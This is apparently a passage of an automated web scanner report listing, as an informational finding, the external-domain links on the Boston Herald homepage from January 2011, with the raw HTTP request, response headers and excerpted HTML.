href="/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/8a420e_ltpSteamB012811.jpg" border="0"
width="207" height="181" caption="Ways to take the chill out of winter" />
</a>
...[SNIP]...
<a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard&rsquo;s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/track/star_tracks/view.bg?articleid=1312321&srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/d0a387_Padma_01272011.jpg" border="0"
width="207" height="181" caption="Complicated custody battle for Padma Lakshmi" />
</a>
...[SNIP]...
<a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt="" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=also">
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img src="http://cache.heraldinteractive.com/images/siteImages/jobfind/homepageHotJobsSearch.gif"></a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.homefind.com/?srvc=home&position=also">Homefind</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="featuredListHF_logo">
<img src="http://multimedia.heraldinteractive.com/misc/alsoIn/homefind/HF5728980.jpg" />
    </div>
   <span class="bold">
    <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">
1212 North Main Street,<br>
...[SNIP]...
</span>
        <a class="orange" href="http://www.homefind.com/?listingid=HF5728980">View listing</a>
...[SNIP]...
</div>    
<a class="orange" href="http://www.homefind.com">Search Homes</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/post-property/">Post a Property</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="orange" href="http://www.homefind.com/for-agents/">For Agents</a>
...[SNIP]...
<h2><a class="LinksBlackNone" href="http://www.carfind.com/?srvc=home&position=also">Carfind</a>
...[SNIP]...
<a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/268649_ford012811.jpg" alt="The Ford logo is seen on the automaker&rsquo;s headquarters in this Oct. 26, 2009 file photo taken in Dearborn, Mich." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also">
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/">Search Cars</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://www.carfind.com/sellCar.bg">Sell a Car</a>
...[SNIP]...
<div class="carFindAreaTab"><a class="LinksWhiteNone" href="http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp">Find a dealer</a>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.272. http://www.bostonherald.com/index.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /index.bg

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /index.bg?srvc=home&tab=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Home - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml" />
<script type="text/javascript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/rssBlue.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128mankins_believes_pats_days_are_over/srvc=home&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="250" width="315" alt="Logan Mankins believes Patriots days are over"></a>
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=1"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/18e69eb546_stpDeLeo012811AC.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=1">
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/89c5b31e64_stpRite012811.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a
                        href="/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2">
...[SNIP]...
<a href="/blogs/sports/celtics/"><img src="http://multimedia.heraldinteractive.com/images/promo/20110128/b6181f7db3_DieselTEASE.jpg" alt="Paul Pierce and Shaquille O&rsquo;Neal will play tonight in Phoenix. "></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/business/general/view/20110128goldman_sachs_triples_salaries_for_5_top_executives/format=comments&srvc=home&position=recent">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128lawrence_officer_convicted_of_rape/format=comments&srvc=home&position=recent">
...[SNIP]...
<a href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/srvc=home&position=recent"><img class="recentImage" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" alt="WEB OF WOES: The highly expensive Broadway musical &lsquo;Spider-Man Turn: Off the Dark&rsquo; has been the victim of bad press, according to director Julie Taymor."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/arts_culture/view/2011012865-million_spider-man_leaves_broadway_hanging/format=comments&srvc=home&position=recent">
...[SNIP]...
<!--// AD CONTAINER //-->
    <IFRAME WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_middle ID=i_middle FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome"></IFRAME>
...[SNIP]...
<a href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/srvc=home&position=4"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" alt="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/international/general/view/20110128president_obama_tells_mubarak_must_take_concrete_steps/format=comments&srvc=home&position=4">
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=5"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=5">
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6"><img
src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" alt="Bad Rabbits">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=6">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Comments"><a
href="/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=6">
...[SNIP]...
<a href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=7"><img
src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Eric Williams allegedly posed as a federal marshal.">
</a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=7">
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt=""></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active">
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&srvc=home&position=active">
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/2204fb_WalMart_12032009.JPG" alt=""></a>
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Poll">
<a class="blockOneBlue" href="/business/general/view.bg?articleid=1312531&srvc=home&position=rated">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a class="blockOneBlue"
href="/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=emailed">
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div id="next-arrow-container">
<img alt="More" id="SliderMoreButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsMoreOn.gif" />
</div>
    <div id="prev-arrow-container">
<img alt="Back" id="SliderBackButton" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderNewsBackOff.gif" />
<!--//
<img id="ShadowLeft" src="http://cache.heraldinteractive.com/images/siteImages/slider/sliderShadowLeft.png" alt="" />
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_177x57.jpg" />
<div class="sliderTitle" style="color:#630">
...[SNIP]...
<a href="/blogs/sports/high_school"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/INSIDER_177x57.png" />
<!-- <div class="sliderTitle" style="color: #039">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/on_the_t/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/OnTheT_177x57.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/katyJordanPres_177x57.gif" /></a>
...[SNIP]...
<li class="SliderItem">
<img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxMoney177.gif" alt="Your tax dollars at work" />
<div style="line-height:16px">
...[SNIP]...
<a href="http://www.bostonherald.com/search/?topic=scholz&searchSite=recent&x=0&y=0#articleFull"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/scholz.jpg" /></a>
...[SNIP]...
<a href="http://www.bostonherald.com/shopping/half_price_boston/" style="color:#333; font-weight:bold"><img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/halfPriceBoston177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/news/police_logs/"><img class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/policeBlotter177.gif" alt="Boston Police Blotter" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/projects/mcas2009?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/version5.0/site_images/slider/2009mcas.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/users/register?srvc=slider"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/enews177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="/store/">
<img alt="Boston Herald" class="thumb" border="0" src="http://cache.heraldinteractive.com/store/images/sportsHistory177.jpg" />
<div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/jobfind"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/jobfind177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.shoplocal.com/bostonherald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/shopLocal177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/about/home_delivery/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/homeDelivery177.gif" /><div class="sliderTitle">
...[SNIP]...
<li class="SliderItem"><a href="http://www.collegeanduniversity.net/herald/"><img alt="Boston Herald" class="thumb" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/college177.gif" /><div class="sliderTitle">
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/mediaBiz/index.php/2011/01/28/the-holiday-radio-ratings-rundown/"><img src="http://cache.heraldinteractive.com/blogs/news/mediaBiz/wp-content/uploads/2011/01/matty2.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/"><img src="http://cache.heraldinteractive.com/blogs/sports/celtics/wp-content/uploads/2011/01/kobe.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065"><img src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/live-from-honolulu-logan-mankins-on-the-pats-i-dont-see-them-trying-to-keep-me/"><img src="http://cache.heraldinteractive.com/blogs/sports/rap_sheet/wp-content/uploads/2011/01/mankins-looking-up.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/"><img src="http://cache.heraldinteractive.com/blogs/news/city_desk_wired/wp-content/uploads/2011/01/roof-collapse-in-lynn.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/"><img src="http://cache.heraldinteractive.com/blogs/news/lone_republican/wp-content/uploads/2011/01/deval-82709.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/"><img src="http://multimedia.heraldinteractive.com/images/0075a6139f_ltpvanh10292007.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679"><img src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/"><img src="http://cache.heraldinteractive.com/blogs/sports/red_sox/wp-content/uploads/2011/01/a76f88_010611crawfordnl111.JPG" width="395" style="position: relative; left: -30px; z-index:8; " /><img style="position:relative; top: -20px; z-index:10;" src="/images/version5.0/site_images/fade_bottom_white.png" />
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312690"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/eb38f1_ltpMankins012811.jpg"></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('galleries/index.php?gallery_id=9','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/front_01282011.jpg" alt="" /></a>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('/galleries/index.php?gallery_id=10','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img src="http://multimedia.heraldinteractive.com/images/promo/Sports_01282011.jpg" alt="" /></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
<div>+ <a href="http://coupons.smartsource.com/web/index.aspx?Link=5ZTSY3SFTCCTE">Money Saving Coupons</a>
...[SNIP]...
<div>+ <a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<div>+ <a href="http://www.people2people.com/?connect=boshrld&amp;page=login">Personals</a>
...[SNIP]...
<div>+ <a href="http://www.shoplocal.com/bostonherald/">Great Shopping&nbsp;Deals</a>
...[SNIP]...
<div>+ <a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<a href="/about/electronic_edition/"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/homepage/sampleFrontPage120.jpg" style="border: 1px #333 solid" /></a>
...[SNIP]...
<a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" alt="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a
href="/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also">
...[SNIP]...
<a href="/weather/"><img src="http://cache.heraldinteractive.com/images/siteImages/weather/07.gif" /></a>
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/19.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/02.gif" width="57" height="48"/><br />
...[SNIP]...
<br />
   <img src="http://cache.heraldinteractive.com/images/siteImages/weather/03.gif" width="57" height="48"/><br />
...[SNIP]...
<a
href="/sports/basketball/celtics/view/20110128shaquille_oneal_earns_fresh_shot_eyes_return_tonight_in_phoenix/srvc=home&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c2ecb2_kev_01282011.jpg" alt="WELL WITHIN REACH: Kevin Garnett tries to slap the ball away from the Trail Blazers&#x2019; LaMarcus Aldridge during last night&#x2019;s 88-78 Celtics victory in Portland." /></a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=mlb/teams/028/schedule.aspx?team=028,season=">Schedule</a>&nbsp;&nbsp;|&nbsp;&nbsp;
<a class="LinksRed2None" href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&amp;page=mlb/teams/028/individual.aspx?team=028">Ind. Stats</a>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
